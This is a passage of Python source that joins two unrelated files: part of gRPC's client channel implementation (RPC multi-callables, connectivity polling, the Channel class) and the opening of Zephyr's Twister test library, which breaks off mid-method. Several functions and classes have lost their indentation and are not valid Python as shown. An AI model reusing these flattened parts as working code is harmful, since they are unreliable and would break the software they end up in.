               request,
               timeout=None,
               metadata=None,
               credentials=None,
               wait_for_ready=None,
               compression=None):
        """See grpc.UnaryUnaryMultiCallable.future: asynchronous invocation."""
        state, operations, deadline, rendezvous = self._prepare(
            request, timeout, metadata, wait_for_ready, compression)
        if state is None:
            raise rendezvous  # pylint: disable-msg=raising-bad-type
        else:
            # Integrated call: events are drained by the channel spin thread,
            # enabling the grpc.Future interface on the rendezvous.
            event_handler = _event_handler(state, self._response_deserializer)
            call = self._managed_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, deadline, metadata,
                None if credentials is None else credentials._credentials,
                (operations,), event_handler, self._context)
            return _MultiThreadedRendezvous(state, call,
                                            self._response_deserializer,
                                            deadline)
class _SingleThreadedUnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
    """Unary-stream callable whose iteration runs entirely on one thread.

    Selected when the SingleThreadedUnaryStream channel option is set; the
    returned rendezvous drains events synchronously rather than via the
    channel spin thread.
    """

    # pylint: disable=too-many-arguments
    def __init__(self, channel, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def __call__(  # pylint: disable=too-many-locals
            self,
            request,
            timeout=None,
            metadata=None,
            credentials=None,
            wait_for_ready=None,
            compression=None):
        deadline = _deadline(timeout)
        serialized_request = _common.serialize(request,
                                               self._request_serializer)
        if serialized_request is None:
            # Serialization failure terminates before the call is created.
            state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
                              'Exception serializing request!')
            raise _InactiveRpcError(state)

        state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
        call_credentials = None if credentials is None else credentials._credentials
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        # Three batches: send side, status receipt, and initial-metadata
        # receipt — initial metadata lands before any message (see
        # _SingleThreadedRendezvous.initial_metadata).
        operations = (
            (cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                 initial_metadata_flags),
             cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
             cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS)),
            (cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),),
            (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
        )
        # Segregated call with None tags: the rendezvous itself drains events.
        operations_and_tags = tuple((ops, None) for ops in operations)
        # NOTE(review): the call-level argument here is the raw `metadata`
        # while the send operation carries `augmented_metadata` — presumably
        # intentional, but confirm against upstream.
        call = self._channel.segregated_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), metadata, call_credentials,
            operations_and_tags, self._context)
        return _SingleThreadedRendezvous(state, call,
                                         self._response_deserializer, deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
    """Default (multi-threaded) unary-request/stream-response callable."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def __call__(  # pylint: disable=too-many-locals
            self,
            request,
            timeout=None,
            metadata=None,
            credentials=None,
            wait_for_ready=None,
            compression=None):
        deadline, serialized_request, rendezvous = _start_unary_request(
            request, timeout, self._request_serializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        if serialized_request is None:
            raise rendezvous  # pylint: disable-msg=raising-bad-type
        else:
            augmented_metadata = _compression.augment_metadata(
                metadata, compression)
            state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
            # First batch: entire send side plus final-status receipt;
            # second batch: initial-metadata receipt.
            operationses = (
                (
                    cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                        initial_metadata_flags),
                    cygrpc.SendMessageOperation(serialized_request,
                                                _EMPTY_FLAGS),
                    cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                    cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
                ),
                (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
            )
            # Integrated call serviced by the channel spin thread; the
            # rendezvous issues per-message receive operations as iterated.
            call = self._managed_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, _determine_deadline(deadline), metadata,
                None if credentials is None else credentials._credentials,
                operationses, _event_handler(state,
                                             self._response_deserializer),
                self._context)
            return _MultiThreadedRendezvous(state, call,
                                            self._response_deserializer,
                                            deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
    """Invocation-side implementation of a stream-request/unary-response RPC."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def _blocking(self, request_iterator, timeout, metadata, credentials,
                  wait_for_ready, compression):
        # Segregated call: requests are fed by the consumption thread while
        # this thread drains completion events until nothing is due.
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        call = self._channel.segregated_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), augmented_metadata,
            None if credentials is None else credentials._credentials,
            _stream_unary_invocation_operationses_and_tags(
                augmented_metadata, initial_metadata_flags), self._context)
        # event_handler=None: this thread consumes events itself below.
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, None)
        while True:
            event = call.next_event()
            with state.condition:
                _handle_event(event, state, self._response_deserializer)
                state.condition.notify_all()
                if not state.due:
                    break
        return state, call

    def __call__(self,
                 request_iterator,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        """See grpc.StreamUnaryMultiCallable.__call__: blocking invocation."""
        state, call, = self._blocking(request_iterator, timeout, metadata,
                                      credentials, wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, False, None)

    def with_call(self,
                  request_iterator,
                  timeout=None,
                  metadata=None,
                  credentials=None,
                  wait_for_ready=None,
                  compression=None):
        """See grpc.StreamUnaryMultiCallable.with_call: response plus call."""
        state, call, = self._blocking(request_iterator, timeout, metadata,
                                      credentials, wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, True, None)

    def future(self,
               request_iterator,
               timeout=None,
               metadata=None,
               credentials=None,
               wait_for_ready=None,
               compression=None):
        """See grpc.StreamUnaryMultiCallable.future: asynchronous invocation."""
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
        event_handler = _event_handler(state, self._response_deserializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        # NOTE(review): the operation batches below receive the raw
        # `metadata` while _blocking() passes `augmented_metadata`; on this
        # path compression metadata appears to be omitted from the send
        # batch — confirm intent against upstream before changing.
        call = self._managed_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, deadline, augmented_metadata,
            None if credentials is None else credentials._credentials,
            _stream_unary_invocation_operationses(metadata,
                                                  initial_metadata_flags),
            event_handler, self._context)
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, event_handler)
        return _MultiThreadedRendezvous(state, call,
                                        self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
    """Invocation-side implementation of a bidirectional-streaming RPC."""

    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()

    def __call__(self,
                 request_iterator,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        deadline = _deadline(timeout)
        state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        # Send metadata + status receipt in one batch; initial-metadata
        # receipt in another.  Messages flow via _consume_request_iterator
        # (requests) and per-iteration receive operations (responses).
        operationses = (
            (
                cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                    initial_metadata_flags),
                cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
            ),
            (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
        )
        event_handler = _event_handler(state, self._response_deserializer)
        call = self._managed_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), augmented_metadata,
            None if credentials is None else credentials._credentials,
            operationses, event_handler, self._context)
        _consume_request_iterator(request_iterator, state, call,
                                  self._request_serializer, event_handler)
        return _MultiThreadedRendezvous(state, call,
                                        self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
    """Stores immutable initial metadata flags"""

    def __new__(cls, value=_EMPTY_FLAGS):
        # Mask to the flag bits gRPC core actually recognizes.
        value &= cygrpc.InitialMetadataFlags.used_mask
        return super(_InitialMetadataFlags, cls).__new__(cls, value)

    def with_wait_for_ready(self, wait_for_ready):
        """Return flags with wait-for-ready applied.

        Args:
          wait_for_ready: True to set, False to clear the wait_for_ready
            flag (either way also marking it explicitly set), or None to
            leave the flags unchanged.

        Returns:
          self when wait_for_ready is None, otherwise a new
          _InitialMetadataFlags instance.
        """
        if wait_for_ready is not None:
            if wait_for_ready:
                return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
                    cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
            else:
                # The previous `elif not wait_for_ready:` was always true
                # here; a plain else expresses the same logic.
                return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
                    cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
        return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def __del__(self):
self.channel.close(cygrpc.StatusCode.cancelled, 'Channel deallocated!')
def _run_channel_spin_thread(state):
    """Start the daemon thread that drains the channel's completion events.

    The thread dispatches each event to its tag (the per-RPC event handler)
    and exits once the number of managed calls drops to zero; the next
    managed call creation starts a fresh spin thread.
    """

    def channel_spin():
        while True:
            # Cooperate with os.fork(): park while a fork is in progress.
            cygrpc.block_if_fork_in_progress(state)
            event = state.channel.next_call_event()
            if event.completion_type == cygrpc.CompletionType.queue_timeout:
                continue
            # The tag is the event handler; it reports whether its RPC ended.
            call_completed = event.tag(event)
            if call_completed:
                with state.lock:
                    state.managed_calls -= 1
                    if state.managed_calls == 0:
                        return

    channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
    channel_spin_thread.setDaemon(True)
    channel_spin_thread.start()
def _channel_managed_call_management(state):
    """Return a factory creating integrated calls tracked by `state`.

    The returned callable increments the managed-call count and lazily
    starts the channel spin thread that services those calls' events.
    """

    # pylint: disable=too-many-arguments
    def create(flags, method, host, deadline, metadata, credentials,
               operationses, event_handler, context):
        """Creates a cygrpc.IntegratedCall.

        Args:
          flags: An integer bitfield of call flags.
          method: The RPC method.
          host: A host string for the created call.
          deadline: A float to be the deadline of the created call or None if
            the call is to have an infinite deadline.
          metadata: The metadata for the call or None.
          credentials: A cygrpc.CallCredentials or None.
          operationses: An iterable of iterables of cygrpc.Operations to be
            started on the call.
          event_handler: A behavior to call to handle the events resultant from
            the operations on the call.
          context: Context object for distributed tracing.
        Returns:
          A cygrpc.IntegratedCall with which to conduct an RPC.
        """
        # Every batch shares the same event handler as its tag.
        operationses_and_tags = tuple((
            operations,
            event_handler,
        ) for operations in operationses)
        with state.lock:
            call = state.channel.integrated_call(flags, method, host, deadline,
                                                 metadata, credentials,
                                                 operationses_and_tags, context)
            if state.managed_calls == 0:
                # First managed call: spin thread must be (re)started.
                state.managed_calls = 1
                _run_channel_spin_thread(state)
            else:
                state.managed_calls += 1
            return call

    return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
    """Invoke connectivity callbacks until no stale subscribers remain.

    Runs on a dedicated delivery thread; exceptions raised by user callbacks
    are logged and suppressed so one bad subscriber cannot stop delivery.
    """
    connectivity = initial_connectivity
    callbacks = initial_callbacks
    while True:
        for callback in callbacks:
            # Stay fork-safe between user callback invocations.
            cygrpc.block_if_fork_in_progress(state)
            try:
                callback(connectivity)
            except Exception:  # pylint: disable=broad-except
                _LOGGER.exception(
                    _CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
        with state.lock:
            # Pick up any connectivity changes that occurred while delivering.
            callbacks = _deliveries(state)
            if callbacks:
                connectivity = state.connectivity
            else:
                # Nothing stale left: hand the delivering flag back.
                state.delivering = False
                return
def _spawn_delivery(state, callbacks):
    """Start a daemon thread delivering connectivity updates to callbacks.

    Caller must hold state.lock (the `delivering` flag is set here and
    cleared by _deliver when it runs out of stale subscribers).
    """
    delivering_thread = cygrpc.ForkManagedThread(target=_deliver,
                                                 args=(
                                                     state,
                                                     state.connectivity,
                                                     callbacks,
                                                 ))
    delivering_thread.setDaemon(True)
    delivering_thread.start()
    state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
    """Watch channel connectivity on a dedicated thread, fanning out updates.

    Loops on channel.watch_connectivity_state with a short (0.2s) horizon so
    the thread can notice unsubscription and fork events; exits (clearing
    state.polling) once no subscribers remain and no connect is requested.
    """
    try_to_connect = initial_try_to_connect
    connectivity = channel.check_connectivity_state(try_to_connect)
    with state.lock:
        state.connectivity = (
            _common.
            CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[connectivity])
        # Initial delivery: every existing subscriber is stale by definition.
        callbacks = tuple(
            callback for callback, unused_but_known_to_be_none_connectivity in
            state.callbacks_and_connectivities)
        for callback_and_connectivity in state.callbacks_and_connectivities:
            callback_and_connectivity[1] = state.connectivity
        if callbacks:
            _spawn_delivery(state, callbacks)
    while True:
        event = channel.watch_connectivity_state(connectivity,
                                                 time.time() + 0.2)
        cygrpc.block_if_fork_in_progress(state)
        with state.lock:
            if not state.callbacks_and_connectivities and not state.try_to_connect:
                # No subscribers and no pending connect request: stop polling.
                state.polling = False
                state.connectivity = None
                break
            try_to_connect = state.try_to_connect
            state.try_to_connect = False
        if event.success or try_to_connect:
            connectivity = channel.check_connectivity_state(try_to_connect)
            with state.lock:
                state.connectivity = (
                    _common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
                        connectivity])
                # Only spawn a new delivery thread if one isn't already
                # running; an active one will pick up the change itself.
                if not state.delivering:
                    callbacks = _deliveries(state)
                    if callbacks:
                        _spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
    """Register a connectivity callback, starting the poller if needed.

    Three cases under the lock: (1) no subscribers and no poller yet — start
    the polling thread, which performs the first delivery; (2) a known
    connectivity and no active delivery — deliver the current value to the
    new callback immediately on a fresh thread; (3) otherwise just record
    the subscription for the next delivery pass.
    """
    with state.lock:
        if not state.callbacks_and_connectivities and not state.polling:
            polling_thread = cygrpc.ForkManagedThread(
                target=_poll_connectivity,
                args=(state, state.channel, bool(try_to_connect)))
            polling_thread.setDaemon(True)
            polling_thread.start()
            state.polling = True
            # Connectivity None: the poller's first pass delivers to us.
            state.callbacks_and_connectivities.append([callback, None])
        elif not state.delivering and state.connectivity is not None:
            _spawn_delivery(state, (callback,))
            state.try_to_connect |= bool(try_to_connect)
            # Record current connectivity as already delivered.
            state.callbacks_and_connectivities.append(
                [callback, state.connectivity])
        else:
            state.try_to_connect |= bool(try_to_connect)
            state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
    """Extend channel options with compression and the Python user agent."""
    compression_option = _compression.create_channel_option(compression)
    user_agent_option = (
        cygrpc.ChannelArgKey.primary_user_agent_string,
        _USER_AGENT,
    )
    return tuple(base_options) + compression_option + (user_agent_option,)
def _separate_channel_options(options):
"""Separates core channel options from Python channel options."""
core_options = []
python_options = []
for pair in options:
if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
python_options.append(pair)
else:
core_options.append(pair)
return python_options, core_options
class Channel(grpc.Channel):
    """A cygrpc.Channel-backed implementation of grpc.Channel."""

    def __init__(self, target, options, credentials, compression):
        """Constructor.

        Args:
          target: The target to which to connect.
          options: Configuration options for the channel.
          credentials: A cygrpc.ChannelCredentials or None.
          compression: An optional value indicating the compression method to be
            used over the lifetime of the channel.
        """
        python_options, core_options = _separate_channel_options(options)
        self._single_threaded_unary_stream = _DEFAULT_SINGLE_THREADED_UNARY_STREAM
        self._process_python_options(python_options)
        self._channel = cygrpc.Channel(
            _common.encode(target), _augment_options(core_options, compression),
            credentials)
        self._call_state = _ChannelCallState(self._channel)
        self._connectivity_state = _ChannelConnectivityState(self._channel)
        # Register so fork handling can manage this channel's lifetime.
        cygrpc.fork_register_channel(self)

    def _process_python_options(self, python_options):
        """Sets channel attributes according to python-only channel options."""
        for pair in python_options:
            if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
                self._single_threaded_unary_stream = True

    def subscribe(self, callback, try_to_connect=None):
        """Subscribes *callback* to connectivity updates of this channel."""
        _subscribe(self._connectivity_state, callback, try_to_connect)

    def unsubscribe(self, callback):
        """Removes a previously subscribed connectivity callback."""
        _unsubscribe(self._connectivity_state, callback)

    def unary_unary(self,
                    method,
                    request_serializer=None,
                    response_deserializer=None):
        """Creates a multi-callable for a unary-request, unary-response RPC."""
        return _UnaryUnaryMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def unary_stream(self,
                     method,
                     request_serializer=None,
                     response_deserializer=None):
        """Creates a multi-callable for a unary-request, stream-response RPC."""
        # NOTE(rbellevi): Benchmarks have shown that running a unary-stream RPC
        # on a single Python thread results in an appreciable speed-up. However,
        # due to slight differences in capability, the multi-threaded variant
        # remains the default.
        if self._single_threaded_unary_stream:
            return _SingleThreadedUnaryStreamMultiCallable(
                self._channel, _common.encode(method), request_serializer,
                response_deserializer)
        else:
            return _UnaryStreamMultiCallable(
                self._channel,
                _channel_managed_call_management(self._call_state),
                _common.encode(method), request_serializer,
                response_deserializer)

    def stream_unary(self,
                     method,
                     request_serializer=None,
                     response_deserializer=None):
        """Creates a multi-callable for a stream-request, unary-response RPC."""
        return _StreamUnaryMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def stream_stream(self,
                      method,
                      request_serializer=None,
                      response_deserializer=None):
        """Creates a multi-callable for a stream-request, stream-response RPC."""
        return _StreamStreamMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def _unsubscribe_all(self):
        # Drops every connectivity registration in one shot (under the lock).
        state = self._connectivity_state
        if state:
            with state.lock:
                del state.callbacks_and_connectivities[:]

    def _close(self):
        # Cancels outstanding calls and unregisters from fork management.
        self._unsubscribe_all()
        self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
        cygrpc.fork_unregister_channel(self)

    def _close_on_fork(self):
        # Variant of _close used by the fork handlers in the child process.
        self._unsubscribe_all()
        self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
                                    'Channel closed due to fork')

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self._close()
        # Returning False propagates any exception raised in the with-block.
        return False

    def close(self):
        """Closes this channel, cancelling outstanding calls."""
        self._close()

    def __del__(self):
        # TODO(https://github.com/grpc/grpc/issues/12531): Several releases
        # after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
        # here (or more likely, call self._close() here). We don't do this today
        # because many valid use cases today allow the channel to be deleted
        # immediately after stubs are created. After a sufficient period of time
        # has passed for all users to be trusted to hang out to their channels
        # for as long as they are in use and to close them after using them,
        # then deletion of this grpc._channel.Channel instance can be made to
        # effect closure of the underlying cygrpc.Channel instance.
        try:
            self._unsubscribe_all()
        except:  # pylint: disable=bare-except
            # Exceptions in __del__ are ignored by Python anyway, but they can
            # keep spamming logs. Just silence them.
            pass
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
# Twister cannot run without a Zephyr tree to locate scripts and tests in.
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
    sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
                                "python-devicetree", "src"))
from devicetree import edtlib  # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
# Make in-tree helper modules (scl, expr_parser) importable.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
    """Process-safe counters tracking twister execution progress.

    Each counter is a multiprocessing.Value so worker processes can update
    the totals concurrently; every read and write takes the Value's own
    lock.  The repeated with-lock read/write bodies of the original are
    factored into the `_get`/`_set` helpers; the public property interface
    is unchanged.
    """

    def __init__(self, total=0):
        """Creates all counters; *total* is the planned number of suites."""
        self._done = Value('i', 0)
        self._passed = Value('i', 0)
        self._skipped_configs = Value('i', 0)
        self._skipped_runtime = Value('i', 0)
        self._skipped_filter = Value('i', 0)
        self._skipped_cases = Value('i', 0)
        self._error = Value('i', 0)
        self._failed = Value('i', 0)
        self._total = Value('i', total)
        self._cases = Value('i', 0)
        # Coarse lock for callers that need to update several counters
        # atomically; the accessors below use each Value's own lock.
        self.lock = Lock()

    @staticmethod
    def _get(counter):
        # Read a shared Value under its own lock.
        with counter.get_lock():
            return counter.value

    @staticmethod
    def _set(counter, value):
        # Write a shared Value under its own lock.
        with counter.get_lock():
            counter.value = value

    def summary(self):
        """Logs a human-readable summary of all counters."""
        logger.debug("--------------------------------")
        logger.debug(f"Total Test suites: {self.total}")
        logger.debug(f"Total Test cases: {self.cases}")
        logger.debug(f"Skipped test cases: {self.skipped_cases}")
        logger.debug(f"Completed Testsuites: {self.done}")
        logger.debug(f"Passing Testsuites: {self.passed}")
        logger.debug(f"Failing Testsuites: {self.failed}")
        logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
        logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
        logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
        logger.debug(f"Errors: {self.error}")
        logger.debug("--------------------------------")

    @property
    def cases(self):
        return self._get(self._cases)

    @cases.setter
    def cases(self, value):
        self._set(self._cases, value)

    @property
    def skipped_cases(self):
        return self._get(self._skipped_cases)

    @skipped_cases.setter
    def skipped_cases(self, value):
        self._set(self._skipped_cases, value)

    @property
    def error(self):
        return self._get(self._error)

    @error.setter
    def error(self, value):
        self._set(self._error, value)

    @property
    def done(self):
        return self._get(self._done)

    @done.setter
    def done(self, value):
        self._set(self._done, value)

    @property
    def passed(self):
        return self._get(self._passed)

    @passed.setter
    def passed(self, value):
        self._set(self._passed, value)

    @property
    def skipped_configs(self):
        return self._get(self._skipped_configs)

    @skipped_configs.setter
    def skipped_configs(self, value):
        self._set(self._skipped_configs, value)

    @property
    def skipped_filter(self):
        return self._get(self._skipped_filter)

    @skipped_filter.setter
    def skipped_filter(self, value):
        self._set(self._skipped_filter, value)

    @property
    def skipped_runtime(self):
        return self._get(self._skipped_runtime)

    @skipped_runtime.setter
    def skipped_runtime(self, value):
        self._set(self._skipped_runtime, value)

    @property
    def failed(self):
        return self._get(self._failed)

    @failed.setter
    def failed(self, value):
        self._set(self._failed, value)

    @property
    def total(self):
        # Read-only: the planned total is fixed at construction time.
        return self._get(self._total)
class CMakeCacheEntry:
    '''Represents a CMake cache entry.

    This class understands the type system in a CMakeCache.txt, and
    converts the following cache types to Python types:

      Cache Type    Python type
      ----------    -------------------------------------------
      FILEPATH      str
      PATH          str
      STRING        str OR list of str (if ';' is in the value)
      BOOL          bool
      INTERNAL      str OR list of str (if ';' is in the value)
      ----------    -------------------------------------------
    '''

    # Regular expression for a cache entry.
    #
    # CMake variable names can include escape characters, allowing a
    # wider set of names than is easy to match with a regular
    # expression. To be permissive here, use a non-greedy match up to
    # the first colon (':'). This breaks if the variable name has a
    # colon inside, but it's good enough.
    CACHE_ENTRY = re.compile(
        r'''(?P<name>.*?)                               # name
        :(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL)  # type
        =(?P<value>.*)                                 # value
        ''', re.X)

    @classmethod
    def _to_bool(cls, val):
        """Converts a CMake BOOL string into a Python bool.

        Raises:
            ValueError: if *val* is neither a named boolean constant nor
                an integer literal.
        """
        # "True if the constant is 1, ON, YES, TRUE, Y, or a
        # non-zero number. False if the constant is 0, OFF, NO,
        # FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
        # the suffix -NOTFOUND. Named boolean constants are
        # case-insensitive. If the argument is not one of these
        # constants, it is treated as a variable."
        #
        # https://cmake.org/cmake/help/v3.0/command/if.html
        #
        # Fix over the previous revision: always return a real bool.
        # The named-constant branches used to return the ints 1/0 while
        # the numeric fallback returned a bool, contradicting the class
        # docstring ("BOOL -> bool").  bool is an int subclass, so this
        # stays backward compatible for arithmetic/truthiness callers.
        val = val.upper()
        if val in ('ON', 'YES', 'TRUE', 'Y'):
            return True
        elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
            return False
        elif val.endswith('-NOTFOUND'):
            return False
        else:
            try:
                return int(val) != 0
            except ValueError as exc:
                raise ValueError('invalid bool {}'.format(val)) from exc

    @classmethod
    def from_line(cls, line, line_no):
        """Parses one CMakeCache.txt line into an entry.

        Returns None for comments, blank lines, and unparseable lines;
        *line_no* is only used to annotate BOOL conversion errors.
        """
        # Comments can only occur at the beginning of a line.
        # (The value of an entry could contain a comment character).
        if line.startswith('//') or line.startswith('#'):
            return None
        # Whitespace-only lines do not contain cache entries.
        if not line.strip():
            return None
        m = cls.CACHE_ENTRY.match(line)
        if not m:
            return None
        name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
        if type_ == 'BOOL':
            try:
                value = cls._to_bool(value)
            except ValueError as exc:
                args = exc.args + ('on line {}: {}'.format(line_no, line),)
                raise ValueError(args) from exc
        elif type_ in ['STRING', 'INTERNAL']:
            # If the value is a CMake list (i.e. is a string which
            # contains a ';'), convert to a Python list.
            if ';' in value:
                value = value.split(';')
        return CMakeCacheEntry(name, value)

    def __init__(self, name, value):
        self.name = name
        self.value = value

    def __str__(self):
        fmt = 'CMakeCacheEntry(name={}, value={})'
        return fmt.format(self.name, self.value)
class CMakeCache:
    '''Parses and represents a CMake cache file.'''

    @staticmethod
    def from_file(cache_file):
        """Alternate constructor: parse *cache_file* into a CMakeCache."""
        return CMakeCache(cache_file)

    def __init__(self, cache_file):
        self.cache_file = cache_file
        self.load(cache_file)

    def load(self, cache_file):
